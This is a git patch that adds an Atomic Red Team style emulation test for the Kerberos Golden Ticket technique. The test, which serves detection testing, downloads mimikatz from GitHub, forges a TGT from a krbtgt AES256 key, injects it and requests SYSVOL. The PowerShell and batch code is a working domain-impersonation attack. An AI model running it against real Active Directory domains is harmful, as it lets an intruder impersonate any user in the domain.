From d50239ff5721d7bf967a1c96985e314585ade2fa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 6 Jan 2021 19:35:14 +0100 Subject: [PATCH] T1558.001: add test "Golden ticket" (#1351) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * T1558.001: add test "Golden ticket" Co-authored-by: Zakaria Addi Co-authored-by: Clément Notin * Add support for default domain SID (one less parameter to specify) With default: invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" } [...] mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:S-1-5-21-1891480667-311803191-3341389180 /aes256:xxxxx /user:goldenticketfakeuser /ptt With specific SID ("toto"): invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" ; "domain_sid"="toto" } [...] mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:toto /aes256:xxxxx /user:goldenticketfakeuser /ptt Co-authored-by: Zakaria Addi --- atomics/T1558.001/T1558.001.yaml | 100 +++++++++++++++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 atomics/T1558.001/T1558.001.yaml diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml new file mode 100644 index 00000000..2c5ba55e --- /dev/null +++ b/atomics/T1558.001/T1558.001.yaml @@ -0,0 +1,100 @@ +attack_technique: T1558.001 +display_name: 'Steal or Forge Kerberos Tickets: Golden Ticket' +atomic_tests: +- name: Crafting golden tickets with mimikatz + auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af + description: | + Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. + This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). + The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. + supported_platforms: + - windows + input_arguments: + domain_sid: + description: SID of the targeted domain, if you keep default it will automatically get the current domain SID + type: string + default: S-1-5-21-DEFAULT + domain: + description: Targeted domain FQDN + type: string + default: example.com + account: + description: Account to impersonate + type: string + default: goldenticketfakeuser + krbtgt_aes256_key: + description: Krbtgt AES256 key + type: string + default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + dependency_executor_name: powershell + dependencies: + - description: | + Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + executor: + name: powershell + elevation_required: false + command: | + Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore + Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore + + # get current domain SID if default was used + $domain_sid = "#{domain_sid}" + If ($domain_sid -Match "DEFAULT") { + # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60 + $domain = gwmi Win32_ComputerSystem | Select -Expand Domain + $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value + $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-')) + } + + # create batch file with commands to run in a separate "runas /netonly" session + # so we don't purge Kerberos ticket from the current Windows session + # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise + @" + >%TEMP%\golden.txt 2>&1 ( + echo Purge existing tickets and create golden ticket: + klist purge + #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit" + + echo. + echo Requesting SYSVOL: + dir \\#{domain}\SYSVOL + + echo. + echo Tickets after requesting SYSVOL: + klist + + echo. + echo End of Golden Ticket attack + ) + "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat + + # run batch file in a new empty session (password and username do not matter) + echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null + + # wait until the output file has logged the entire attack + do { + Start-Sleep 1 # wait a bit so the output file has time to be created + Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { + if ($_ -match 'End of Golden Ticket attack') { break } + } + } while ($false) # dummy loop so that 'break' can be used + + # show output from new empty session + Get-Content $env:TEMP\golden.txt + + # cleanup temp files + Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore + Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore \ No newline at end of file